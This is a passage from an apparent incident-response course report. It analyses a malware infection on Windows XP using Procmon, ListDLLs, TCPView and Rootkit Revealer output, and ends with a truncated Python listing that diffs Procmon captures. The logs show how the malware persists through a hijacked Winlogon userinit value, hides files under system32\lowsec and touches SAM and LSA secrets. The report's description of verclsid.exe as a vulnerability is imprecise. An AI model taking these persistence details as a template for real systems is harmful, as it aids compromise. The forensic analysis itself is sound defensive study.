0x5e0c0000 0xd000 5.01.2600.5512 pstorec.dll
0x76b20000 0x11000 3.05.2284.0002 ATL.DLL
0x5b860000 0x55000 5.01.2600.5694 netapi32.dll
0x75970000 0xf8000 5.01.2600.5512 MSGINA.dll
0x74320000 0x3d000 3.525.3012.0000 ODBC32.dll
0x763b0000 0x49000 6.00.2900.5512 comdlg32.dll
0x02c50000 0x17000 3.525.1132.0000 odbcint.dll
0x71ab0000 0x17000 5.01.2600.5512 ws2_32.dll
0x71aa0000 0x8000 5.01.2600.5512 WS2HELP.dll
0x7c9c0000 0x817000 6.00.2900.6072 shell32.dll
0x77f60000 0x76000 6.00.2900.5912 SHLWAPI.dll
0x773d0000 0x103000 5.82.2900.6028 comctl32.dll
0x77c00000 0x8000 5.01.2600.5512 VERSION.dll
0x769c0000 0xb4000 5.01.2600.5512 userenv.dll
0x68000000 0x36000 5.01.2600.5507 rsaenh.dll

WinMerge Procmon

Sample output of some of the interesting items discovered; the full output is very long.

"8:04:53.2816426 PM","winlogon.exe","916","RegCreateKey","HKLM\software\microsoft\windows nt\currentversion\winlogon","SUCCESS","Desired Access: Query Value, Set Value"
"8:04:53.2817289 PM","winlogon.exe","916","RegQueryValue","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit","SUCCESS","Type: REG_SZ, Length: 130, Data: C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,"
"8:04:53.2817808 PM","winlogon.exe","916","RegCloseKey","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","SUCCESS",""
"7:47:44.6292542 PM","lsass.exe","972","RegOpenKey","HKLM\SECURITY\Policy\SecDesc","SUCCESS","Desired Access: Read"
"8:04:53.3393918 PM","lsass.exe","972","RegOpenKey","HKLM\SECURITY\Policy","SUCCESS","Desired Access: Read/Write"
"8:04:53.3394714 PM","lsass.exe","972","RegQueryValue","HKLM\SECURITY\Policy\SecDesc\(Default)","BUFFER OVERFLOW","Length: 12"
"8:04:53.4492538 PM","lsass.exe","972","RegCloseKey","HKLM\SECURITY\Policy","SUCCESS",""
"8:04:54.5563677 PM","Explorer.EXE","424","QueryDirectory","C:\Documents and Settings\Kevin\Desktop\ss","SUCCESS","0: handle.exe, 1: hex2dec.exe, 2: junction.exe, 3: kjk_before.bat, 4: ldmdump.exe, 5: Listdlls.exe, 6: listdlls_before.txt, 7: livekd.exe, 8: LoadOrd.exe, 9: logonsessions.exe, 10: movefile.exe, 11: ntfsinfo.exe, 12: pagedfrg.exe, 13: pagedfrg.hlp, 14: pdh.dll, 15: pendmoves.exe, 16: pipelist.exe, 17: PORTMON.CNT, 18: portmon.exe, 19: PORTMON.HLP, 20: procdump.exe, 21: procexp.chm, 22: procexp.exe, 23: ProcFeatures.exe, 24: procmon.chm, 25: Procmon.exe, 26: PsExec.exe, 27: psfile.exe, 28: PsGetsid.exe, 29: PsInfo.exe, 30: pskill.exe, 31: PsList.exe, 32: pslist_before.txt"

verclsid.exe:
CreateFile C: SUCCESS Desired Access: Read Attributes, Write Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, OpenResult: Opened
QueryInformationVolume C: SUCCESS VolumeCreationTime: 3/22/2011 4:48:20 PM, VolumeSerialNumber: 907B-F0DE, SupportsObjects: True, VolumeLabel:
RegCreateKey HKCU\Software\Microsoft\SystemCertificates\MY SUCCESS Desired Access: All Access
RegQueryValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Personal SUCCESS Type: REG_EXPAND_SZ, Length: 54, Data: %USERPROFILE%\My Documents
RegQueryValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local Settings SUCCESS Type: REG_EXPAND_SZ, Length: 58, Data: %USERPROFILE%\Local Settings
RegQueryKey HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Query: Full, SubKeys: 0, Values: 13
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 0, Name: ComSpec, Type: REG_EXPAND_SZ, Length: 60, Data: %SystemRoot%\system32\cmd.exe
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 1, Name: Path, Type: REG_EXPAND_SZ, Length: 124, Data: %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 2, Name: windir, Type: REG_EXPAND_SZ, Length: 26, Data: %SystemRoot%
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 3, Name: OS, Type: REG_SZ, Length: 22, Data: Windows_NT
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 4, Name: PROCESSOR_ARCHITECTURE, Type: REG_SZ, Length: 8, Data: x86
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 5, Name: PROCESSOR_LEVEL, Type: REG_SZ, Length: 4, Data: 6
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 6, Name: PROCESSOR_IDENTIFIER, Type: REG_SZ, Length: 96, Data: x86 Family 6 Model 23 Stepping 10, GenuineIntel
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 7, Name: PROCESSOR_REVISION, Type: REG_SZ, Length: 10, Data: 170a
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 8, Name: NUMBER_OF_PROCESSORS, Type: REG_SZ, Length: 4, Data: 1
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 9, Name: PATHEXT, Type: REG_SZ, Length: 98, Data: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 10, Name: TEMP, Type: REG_EXPAND_SZ, Length: 36, Data: %SystemRoot%\TEMP
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 11, Name: TMP, Type: REG_EXPAND_SZ, Length: 36, Data: %SystemRoot%\TEMP
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 12, Name: FP_NO_HOST_CHECK, Type: REG_SZ, Length: 6, Data: NO
RegOpenKey HKCU\Volatile Environment SUCCESS Desired Access: Read
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 0, Name: LOGONSERVER, Type: REG_SZ, Length: 26, Data: \\XPWUPDATES
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 1, Name: CLIENTNAME, Type: REG_SZ, Length: 16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 2, Name: SESSIONNAME, Type: REG_SZ, Length: 16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 3, Name: APPDATA, Type: REG_SZ, Length: 98, Data: C:\Documents and Settings\Kevin\Application Data
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 4, Name: HOMEDRIVE, Type: REG_SZ, Length: 6, Data: C:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 5, Name: HOMESHARE, Type: REG_SZ, Length: 2, Data:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 6, Name: HOMEPATH, Type: REG_SZ, Length: 60, Data: \Documents and Settings\Kevin
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 0, Name: LOGONSERVER, Type: REG_SZ, Length: 26, Data: \\XPWUPDATES
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 1, Name: CLIENTNAME, Type: REG_SZ, Length: 16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 2, Name: SESSIONNAME, Type: REG_SZ, Length: 16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 3, Name: APPDATA, Type: REG_SZ, Length: 98, Data: C:\Documents and Settings\Kevin\Application Data
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 4, Name: HOMEDRIVE, Type: REG_SZ, Length: 6, Data: C:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 5, Name: HOMESHARE, Type: REG_SZ, Length: 2, Data:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 6, Name: HOMEPATH, Type: REG_SZ, Length: 60, Data: \Documents and Settings\Kevin
QueryNameInformationFile C:\WINDOWS\system32\verclsid.exe SUCCESS Name: \WINDOWS\system32\verclsid.exe
Load Image C:\WINDOWS\system32\verclsid.exe SUCCESS Image Base: 0x1000000, Image Size: 0xb000
Load Image C:\WINDOWS\system32\ntdll.dll SUCCESS Image Base: 0x7c900000, Image Size: 0xb2000
QueryNameInformationFile C:\WINDOWS\system32\verclsid.exe SUCCESS Name: \WINDOWS\system32\verclsid.exe
CreateFile C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf SHARING VIOLATION Desired Access: Generic Read, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: None, AllocationSize: n/a
RegOpenKey HKLM\Software\Clients\Mail SUCCESS Desired Access: Query Value
RegQueryValue HKLM\SOFTWARE\Clients\Mail\(Default) SUCCESS Type: REG_SZ, Length: 32, Data: Outlook Express

lsass.exe RegQueryValue
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName SUCCESS Type: REG_SZ, Length: 22, Data: XPWUPDATES
HKLM\SAM\SAM\C SUCCESS Type: REG_BINARY, Length: 168, Data: 07 00 01 00 00 00 00 00 98 00 00 00 02 00 01 00
HKLM\SAM\SAM\Domains\Account\V SUCCESS Type: REG_BINARY, Length: 296, Data: 00 00 00 00 E0 00 00 00 02 00 01 00 E0 00 00 00
HKLM\SAM\SAM\Domains\Builtin\V SUCCESS Type: REG_BINARY, Length: 212, Data: 00 00 00 00 98 00 00 00 02 00 01 00 98 00 00 00
HKLM\SAM\SAM\Domains\Account\Users\Names\Kevin\(Default) SUCCESS Type: <Unknown: 1003>, Length: 0
HKLM\SAM\SAM\Domains\Account\Users\000003EB\V SUCCESS Type: REG_BINARY, Length: 444, Data: 00 00 00 00 BC 00 00 00 02 00 01 00 BC 00 00 00
RegQueryValue HKLM\SAM\SAM\Domains\Account\Users\000003EB\F SUCCESS Type: REG_BINARY, Length: 80, Data: 02 00 01 00 00 00 00 00 B0 06 A1 4F D9 02 CC 01
HKLM\SECURITY\Policy\SecDesc\(Default) SUCCESS Type: REG_NONE, Length: 180, Data: 01 00 04 80 98 00 00 00 A8 00 00 00 00 00 00 00
HKLM\SAM\SAM\Domains\Account\Users\Names\SUPPORT_388945a0\(Default) SUCCESS Type: <Unknown: 1002>, Length: 0
HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C SUCCESS Type: REG_BINARY, Length: 440, Data: 20 02 00 00 00 00 00 00 98 00 00 00 02 00 01 00
HKLM\SAM\SAM\Domains\Account\Users\Names\HelpAssistant\(Default) SUCCESS Type: <Unknown: 1000>, Length: 0
HKLM\SAM\SAM\Domains\Account\Users\Names\Guest\(Default) SUCCESS Type: <Unknown: 501>, Length: 0
HKLM\SAM\SAM\Domains\Account\Users\Names\Administrator\(Default) SUCCESS Type: <Unknown: 500>, Length: 0

Explorer.exe
Process Create C:\WINDOWS\system32\verclsid.exe SUCCESS PID: 2376, Command line: /S /C {2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
Process Create C:\WINDOWS\system32\verclsid.exe SUCCESS PID: 2444, Command line: /S /C {2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
RegCreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Desired Access: Maximum Allowed
RegEnumKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace SUCCESS Index: 0, Name: {1f4de370-d627-11d1-ba4f-00a0c91eedba}
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-8BBF40B640BF}\EnableDHCP SUCCESS Type: REG_DWORD, Length: 4, Data: 1
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-8BBF40B640BF}\LeaseObtainedTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303688626
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-8BBF40B640BF}\DhcpServer SUCCESS Type: REG_SZ, Length: 32, Data: 255.255.255.255
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-0548AB912EF5}\LeaseObtainedTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303688565
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-0548AB912EF5}\LeaseTerminatesTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303774965
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-0548AB912EF5}\DhcpServer SUCCESS Type: REG_SZ, Length: 24, Data: 192.168.1.1

Page 104: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

svchost.exe

CreateFile C:\WINDOWS\system32\wbem\Logs\wbemcore.log SUCCESS Desired Access: Generic Write, Read

Attributes, Disposition: OpenIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: NNCI, ShareMode: Read,

Delete, AllocationSize: 0, OpenResult: Opened

CreateFile C:\WINDOWS\system32\wbem\wmiprvse.exe SUCCESS Desired Access: Read Data/List

Directory, Execute/Traverse, Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-

Directory File, Attributes: n/a, ShareMode: Read, Delete, AllocationSize: n/a, Impersonating: NT AUTHORITY\SYSTEM,

OpenResult: Opened

CreateFile C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Desired Access: Generic Read, Disposition:

Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, AllocationSize: n/a,

Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened

CreateFile C:\WINDOWS\system32\wbem SUCCESS Desired Access: Read EA, Read Attributes, Read Control,

Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, Impersonating: NT

AUTHORITY\SYSTEM, OpenResult: Opened

CreateFile C:\WINDOWS\WinSxS SUCCESS Desired Access: Read EA, Read Attributes, Read Control,

Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, Impersonating: NT

AUTHORITY\SYSTEM, OpenResult: Opened

CreateFile C:\WINDOWS\WinSxS\X86_MICROSOFT.WINDOWS.COMMON-

CONTROLS_6595B64144CCF1DF_6.0.2600.6028_X-WW_61E65202 SUCCESS Desired Access: Read EA,

Read Attributes, Read Control, Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a,

Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened

CreateFile C:\WINDOWS\Prefetch\WMIPRVSE.EXE-28F301A9.pf SUCCESS Desired Access: Generic

Read/Write, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode:

None, AllocationSize: 0, Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Overwritten

CreateFile C:\WINDOWS\Prefetch SUCCESS Desired Access: Synchronize, Disposition: Open, Options:

Directory, Synchronous IO Non-Alert, Open For Backup, Attributes: N, ShareMode: Read, Write, AllocationSize: n/a,

Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened

CreateFile C:\WINDOWS\system32\lowsec\user.ds.lll SUCCESS Desired Access: Generic Read/Write,

Disposition: OpenIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: H, ShareMode: Read, AllocationSize: 0,

OpenResult: Opened

CreateFile C:\WINDOWS\system32\lowsec\local.ds SUCCESS Desired Access: Generic Read, Disposition:

Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, AllocationSize: n/a,

OpenResult: Opened

CreateFile C:\WINDOWS\system32\config\systemprofile\Cookies\system@kerkvlietkj[1].txt SUCCESS

Desired Access: Generic Write, Read Attributes, Disposition: Create, Options: Synchronous IO Non-Alert, Non-

Directory File, Attributes: NCI, ShareMode: Read, Write, Delete, AllocationSize: 0, OpenResult: Created

CreateFile C:\WINDOWS\WINDOWSSHELL.MANIFEST SUCCESS Desired Access: Read EA, Read

Attributes, Read Control, Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a,

Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened

FlushBuffersFile C:\WINDOWS\system32\lowsec\user.ds.lll SUCCESS

Page 105: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

Process Create C:\WINDOWS\system32\wbem\wmiprvse.exe SUCCESS PID: 3540, Command line:

C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding

QueryOpen C:\WINDOWS\win.ini SUCCESS CreationTime: 8/23/2001 8:00:00 AM, LastAccessTime: 4/24/2011

8:03:01 PM, LastWriteTime: 3/23/2011 1:23:23 AM, ChangeTime: 3/23/2011 1:23:23 AM, AllocationSize: 520, EndOfFile: 519,

FileAttributes: A

QueryOpen C:\WINDOWS\WINDOWSSHELL.MANIFEST SUCCESS CreationTime: 3/22/2011 9:56:13 PM,

LastAccessTime: 4/24/2011 8:04:59 PM, LastWriteTime: 3/22/2011 9:56:13 PM, ChangeTime: 3/22/2011 9:56:13 PM,

AllocationSize: 4,096, EndOfFile: 749, FileAttributes: RHA

QueryOpen C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-

ww_61e65202\comctl32.dll SUCCESS CreationTime: 3/23/2011 9:15:46 PM, LastAccessTime: 4/24/2011 8:04:59

PM, LastWriteTime: 8/23/2010 12:12:02 PM, ChangeTime: 3/23/2011 10:15:32 PM, AllocationSize: 1,056,768, EndOfFile:

1,054,208, FileAttributes: A

QueryOpen C:\Documents and Settings\Kevin\Cookies\index.dat SUCCESS CreationTime: 3/22/2011 9:33:30 PM,

LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM, ChangeTime: 4/24/2011 8:03:51 PM,

AllocationSize: 32,768, EndOfFile: 32,768, FileAttributes: A

QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][2].TXT SUCCESS

CreationTime: 4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:22 PM, LastWriteTime: 4/24/2011 7:59:22 PM,

ChangeTime: 4/24/2011 7:59:22 PM, AllocationSize: 192, EndOfFile: 185, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@BING[1].TXT SUCCESS CreationTime:

4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:23 PM, LastWriteTime: 4/24/2011 7:59:23 PM, ChangeTime: 4/24/2011

7:59:23 PM, AllocationSize: 200, EndOfFile: 200, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@GOOGLE[1].TXT SUCCESS

CreationTime: 4/24/2011 7:44:16 PM, LastAccessTime: 4/24/2011 7:58:30 PM, LastWriteTime: 4/24/2011 7:44:17 PM,

ChangeTime: 4/24/2011 7:44:17 PM, AllocationSize: 352, EndOfFile: 350, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS CreationTime:

4/24/2011 7:44:41 PM, LastAccessTime: 4/24/2011 7:44:41 PM, LastWriteTime: 4/24/2011 7:44:41 PM, ChangeTime: 4/24/2011

7:44:41 PM, AllocationSize: 72, EndOfFile: 69, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS

CreationTime: 4/24/2011 7:44:38 PM, LastAccessTime: 4/24/2011 7:44:38 PM, LastWriteTime: 4/24/2011 7:44:38 PM,

ChangeTime: 4/24/2011 7:44:38 PM, AllocationSize: 288, EndOfFile: 286, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS

CreationTime: 4/24/2011 7:44:39 PM, LastAccessTime: 4/24/2011 7:44:39 PM, LastWriteTime: 4/24/2011 7:44:39 PM,

ChangeTime: 4/24/2011 7:44:39 PM, AllocationSize: 200, EndOfFile: 196, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@MICROSOFT[1].TXT SUCCESS

CreationTime: 4/24/2011 7:46:29 PM, LastAccessTime: 4/24/2011 7:46:31 PM, LastWriteTime: 4/24/2011 7:46:31 PM,

ChangeTime: 4/24/2011 7:46:31 PM, AllocationSize: 456, EndOfFile: 452, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@MOOKIE1[2].TXT SUCCESS

CreationTime: 4/24/2011 7:46:03 PM, LastAccessTime: 4/24/2011 7:46:03 PM, LastWriteTime: 4/24/2011 7:46:03 PM,

ChangeTime: 4/24/2011 7:46:03 PM, AllocationSize: 176, EndOfFile: 172, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS

CreationTime: 4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:22 PM, LastWriteTime: 4/24/2011 7:59:22 PM,

Page 106: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

ChangeTime: 4/24/2011 7:59:22 PM, AllocationSize: 120, EndOfFile: 115, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Local Settings\History\History.IE5\index.dat SUCCESS

CreationTime: 3/22/2011 9:33:30 PM, LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM,

ChangeTime: 4/24/2011 8:03:51 PM, AllocationSize: 49,152, EndOfFile: 49,152, FileAttributes: A

QueryOpen C:\Documents and Settings\Kevin\Local Settings\Temporary Internet Files\Content.IE5\index.dat SUCCESS

CreationTime: 3/22/2011 9:33:30 PM, LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM,

ChangeTime: 4/24/2011 8:03:51 PM, AllocationSize: 425,984, EndOfFile: 425,984, FileAttributes: A

ReadFile C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR SUCCESS Offset: 327,680, Length: 8,192

ReadFile C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA SUCCESS Offset: 5,693,440,

Length: 8,192

RegCreateKey HKLM\Software\Microsoft\WBEM\CIMOM SUCCESS Desired Access: Read

RegCreateKey HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History

SUCCESS Desired Access: Read, Create Sub Key

RegQueryValue HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\Logging SUCCESS Type: REG_SZ, Length: 4,

Data: 1

RegQueryValue HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size SUCCESS Type: REG_SZ,

Length: 12, Data: 65536

RegQueryValue HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic

Provider\Image Path SUCCESS Type: REG_SZ, Length: 22, Data: rsaenh.dll

RegQueryValue HKLM\SYSTEM\Setup\SystemSetupInProgress SUCCESS Type: REG_DWORD, Length: 4, Data:

0

RegQueryValue HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 001\Name SUCCESS

Type: REG_SZ, Length: 80, Data: Microsoft Strong Cryptographic Provider

RegQueryValue HKLM\SOFTWARE\Microsoft\COM3\REGDBVersion SUCCESS Type: REG_BINARY, Length:

8, Data: 07 00 00 00 00 00 00 00

RegQueryValue HKCR\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppID SUCCESS Type:

REG_SZ, Length: 78, Data: {8BC3F05E-D86B-11D0-A075-00C04FB68820}

RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService SUCCESS Type:

REG_SZ, Length: 16, Data: winmgmt

RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default) SUCCESS Type:

REG_SZ, Length: 78, Data: Windows Management and Instrumentation

RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService SUCCESS Type:

REG_SZ, Length: 16, Data: winmgmt

RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission SUCCESS

Type: REG_BINARY, Length: 180, Data: 01 00 04 80 94 00 00 00 A4 00 00 00 00 00 00 00


WriteFile C:\WINDOWS\system32\wbem\Logs\wbemcore.log SUCCESS Offset: 13,965, Length: 91

WriteFile C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf SUCCESS Offset: 0, Length: 28,186

WriteFile C:\WINDOWS\system32\config\systemprofile\Cookies\index.dat SUCCESS Offset: 0, Length:

4,096, I/O Flags: Non-cached, Paging I/O, Synchronous Paging I/O

The WinMerge comparison shows that the files are completely different before and after the infection. I then used a spreadsheet and filtered the results to find the "after" file items of interest based on the "Process Name" and the "Success" value of the registry access result. From inspection of the Procmon output it is evident that many registry keys are being modified and a lot of system files are being created. The WinMerge comparison of the ListDLLs output shows the DLLs that were created. Directories are being queried and the MAC times of the files are being captured. The "verclsid.exe" is an open MS vulnerability9 that was published in 2006 and fixed with a service pack. The "winlogon.exe" process is being controlled by the malware file "sdra64.exe". With "explorer.exe" every directory on the system was queried and the contents of each folder were made known. The same query was done for the volume information of the hard drive.

9 http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx


The QueryNameInformationFile entries for "explorer.exe" gave the details of the files on the system. The "explorer.exe" RegQueryValue operations returned numerous values covering all the important details of the computer system. The "svchost.exe" process is usually where we would see the application program running, and a lot of the system changes occur under this process.

WinMerge TCPView

Only the differences between the "before" and "after" captures are shown (one TCPView entry per line).

svchost.exe 1572 UDP xpwupdates bootpc * * 3 903

svchost.exe 1144 TCP xpwupdates.tampabay.rr.com 1301 host53.webserver.com http ESTABLISHED 2 1,074 2 442

Rootkit Revealer

HKLM\SECURITY\Policy\Secrets\SAC* 3/22/2011 9:41 PM 0 bytes Key name contains embedded nulls (*)

HKLM\SECURITY\Policy\Secrets\SAI* 3/22/2011 9:41 PM 0 bytes Key name contains embedded nulls (*)

C:\WINDOWS\system32\lowsec 4/24/2011 8:02 PM 0 bytes Hidden from Windows API.

C:\WINDOWS\system32\lowsec\local.ds 4/24/2011 8:02 PM 34.27 KB Hidden from Windows API.

C:\WINDOWS\system32\lowsec\user.ds 4/24/2011 7:41 PM 2.37 KB Hidden from Windows API.

C:\WINDOWS\system32\lowsec\user.ds.lll 3/23/2011 11:46 PM 1.34 KB Hidden from Windows API.

C:\WINDOWS\system32\sdra64.exe 4/24/2011 8:02 PM 290.00 KB Hidden from Windows API.

C:\WINDOWS\system32\sdra64.exe:Zone.Identifier 4/24/2011 8:02 PM 26 bytes Hidden from Windows API.
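The before/after comparison described above, automated as an added example (Python, not part of the report): it diffs two Procmon CSV exports, keeps only successful operations that first appear in the "after" capture, counts them per process, and flags paths matching the artifacts Rootkit Revealer listed (the system32\lowsec directory and sdra64.exe). The two CSV captures are constructed for the example; process names, PIDs and times are illustrative, not the report's data.

```python
import csv
import io
from collections import Counter

# Two constructed Procmon CSV exports (not the report's own captures). Columns follow
# Procmon's "Save as CSV" layout; process names, PIDs and times are illustrative.
PROCMON_BEFORE = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"7:40:01.1234567 PM","explorer.exe","1344","QueryOpen","C:\\Documents and Settings\\Kevin\\Cookies\\KEVIN@MICROSOFT[1].TXT","SUCCESS",""
"7:40:02.2345678 PM","svchost.exe","1144","RegQueryValue","HKLM\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\Logging","SUCCESS","Type: REG_SZ, Length: 4, Data: 1"
"""

PROCMON_AFTER = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"8:01:01.1234567 PM","explorer.exe","1344","QueryOpen","C:\\Documents and Settings\\Kevin\\Cookies\\KEVIN@MICROSOFT[1].TXT","SUCCESS",""
"8:01:02.2345678 PM","svchost.exe","1144","RegQueryValue","HKLM\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\Logging","SUCCESS","Type: REG_SZ, Length: 4, Data: 1"
"8:02:10.0000000 PM","winlogon.exe","620","CreateFile","C:\\WINDOWS\\system32\\lowsec\\local.ds","SUCCESS","Desired Access: Generic Write"
"8:02:11.0000000 PM","winlogon.exe","620","WriteFile","C:\\WINDOWS\\system32\\lowsec\\user.ds","SUCCESS","Offset: 0, Length: 2,427"
"8:02:12.0000000 PM","explorer.exe","1344","CreateFile","C:\\WINDOWS\\system32\\sdra64.exe","SUCCESS","Desired Access: Generic Write"
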